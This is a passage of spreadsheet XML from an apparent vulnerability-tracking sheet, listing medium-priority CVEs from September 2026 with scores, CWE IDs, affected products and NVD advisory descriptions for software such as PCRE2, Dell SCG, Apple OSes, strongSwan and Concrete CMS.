          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89157</t>
        </is>
      </c>
      <c r="D693" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr"/>
      <c r="Q693" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R693" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_pattern_convert out-of-bounds write when an attacker can provide a large pattern.</t>
        </is>
      </c>
      <c r="S693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89157</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56839</t>
        </is>
      </c>
      <c r="D694" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F694" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr"/>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr"/>
      <c r="Q694" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-863</t>
        </is>
      </c>
      <c r="R694" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.59, the CODE_TOOLS wrappers keep _workspace_root as None and pass workspace=None to read_file, search_replace, and apply_diff helpers that enforce path containment only for a truthy workspace. An application that exposes code_read_file, code_search_replace, or code_apply_diff before set_workspace can therefore let prompt-influenced calls read and modify files outside the intended project directory, while explicitly configured workspaces remain effective. This vulnerability is fixed in 4.6.59.</t>
        </is>
      </c>
      <c r="S694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56839</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61409</t>
        </is>
      </c>
      <c r="D695" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F695" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr"/>
      <c r="Q695" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R695" s="5" t="inlineStr">
        <is>
          <t>Dell Secure Connect Gateway (SCG) 5.0 Application, versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="S695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61409</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64752</t>
        </is>
      </c>
      <c r="D696" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F696" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos</t>
        </is>
      </c>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr"/>
      <c r="Q696" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R696" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, visionOS 27. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
        </is>
      </c>
      <c r="S696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64752</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71179</t>
        </is>
      </c>
      <c r="D697" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F697" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr"/>
      <c r="Q697" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R697" s="5" t="inlineStr">
        <is>
          <t>Dell Update Package Framework, versions prior to 26.07.03, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="S697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71179</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78135</t>
        </is>
      </c>
      <c r="D698" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr"/>
      <c r="Q698" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="R698" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 5.9.7 through 6.0.7 mishandles behavioral workflow in the IKEv2 state machine. Because CREATE_CHILD_SA requests are mishandled, there can be an authentication bypass.</t>
        </is>
      </c>
      <c r="S698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78135</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79643</t>
        </is>
      </c>
      <c r="D699" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F699" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr"/>
      <c r="Q699" s="5" t="inlineStr">
        <is>
          <t>CWE-480</t>
        </is>
      </c>
      <c r="R699" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Incorrect Operator vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79643</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79691</t>
        </is>
      </c>
      <c r="D700" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F700" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr"/>
      <c r="Q700" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R700" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79691</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84611</t>
        </is>
      </c>
      <c r="D701" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F701" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr"/>
      <c r="Q701" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R701" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted 3D model may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84611</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84632</t>
        </is>
      </c>
      <c r="D702" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F702" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr"/>
      <c r="Q702" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R702" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted 3D model may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84632</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85386</t>
        </is>
      </c>
      <c r="D703" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F703" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr"/>
      <c r="Q703" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R703" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.4 did not sanitize XML and XSLT documents uploaded through a public Form Block file-upload question. Plain XML uploads were validated by file extension only and stored as publicly accessible files that were served inline from the application's own origin. An unauthenticated visitor could therefore store an XML document containing an xml-stylesheet processing instruction that referenced an attacker-supplied, same-origin XSLT stylesheet. When a victim opened the stored file directly in a browser, the browser fetched the stylesheet, transformed the document into HTML, and executed attacker-controlled JavaScript in the Concrete CMS origin (stored cross-site scripting). If the victim was an authenticated administrator, the script could act with that administrator's session, and the reporter demonstrated creation of a new user in the Administrators group. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Valentin SARRE (Independent security researcher) for reporting.</t>
        </is>
      </c>
      <c r="S703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85386</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86754</t>
        </is>
      </c>
      <c r="D704" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr"/>
      <c r="Q704" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R704" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to properly gate Laravel Passport's OAuth client management routes, allowing any authenticated user to register OAuth clients with attacker-controlled redirect URIs. Attackers can trick administrators into approving consent screens, then exchange authorization codes for bearer tokens inheriting full admin API permissions lasting up to 40 years.</t>
        </is>
      </c>
      <c r="S704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86754</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89910</t>
        </is>
      </c>
      <c r="D705" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F705" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr"/>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
LoongArch: KVM: Fix uninitialized stack variable issue with dmsintc
Variable vector[] is declared on stack in function dmsintc_inject_irq()
and sometimes it is used without initialized. Here fix this issue.</t>
        </is>
      </c>
      <c r="S705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89910</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92399</t>
        </is>
      </c>
      <c r="D706" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr"/>
      <c r="Q706" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-122</t>
        </is>
      </c>
      <c r="R706" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in GPAC 26.07.0. This affects the function rmt_client_handle_ws_frame of the file src/utils/rmt_ws.c of the component WebSocket Handler. Executing a manipulation of the argument payload_size can lead to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version abi-16.26 is able to mitigate this issue. This patch is called 37bccbb30cf53a0e1a084cea9a1ce422b3ddfe12. Upgrading the affected component is recommended.</t>
        </is>
      </c>
      <c r="S706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92399</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92406</t>
        </is>
      </c>
      <c r="D707" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr"/>
      <c r="Q707" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R707" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in SourceCodester Inventory and Monitoring System 1.0. The impacted element is an unknown function of the file /admins/assessments/databank/btn_functions.php?action=add. Performing a manipulation of the argument difficulty_id results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92406</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92718</t>
        </is>
      </c>
      <c r="D708" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr"/>
      <c r="Q708" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R708" s="5" t="inlineStr">
        <is>
          <t>Nuclei versions before 3.11.1 cache template signature verification based only on file modification time without content checksums. Attackers can replace verified templates with unsigned malicious content and restore the original modification time to bypass signature checks and execute arbitrary operating system commands.</t>
        </is>
      </c>
      <c r="S708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92718</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17526</t>
        </is>
      </c>
      <c r="D709" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F709" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr">
        <is>
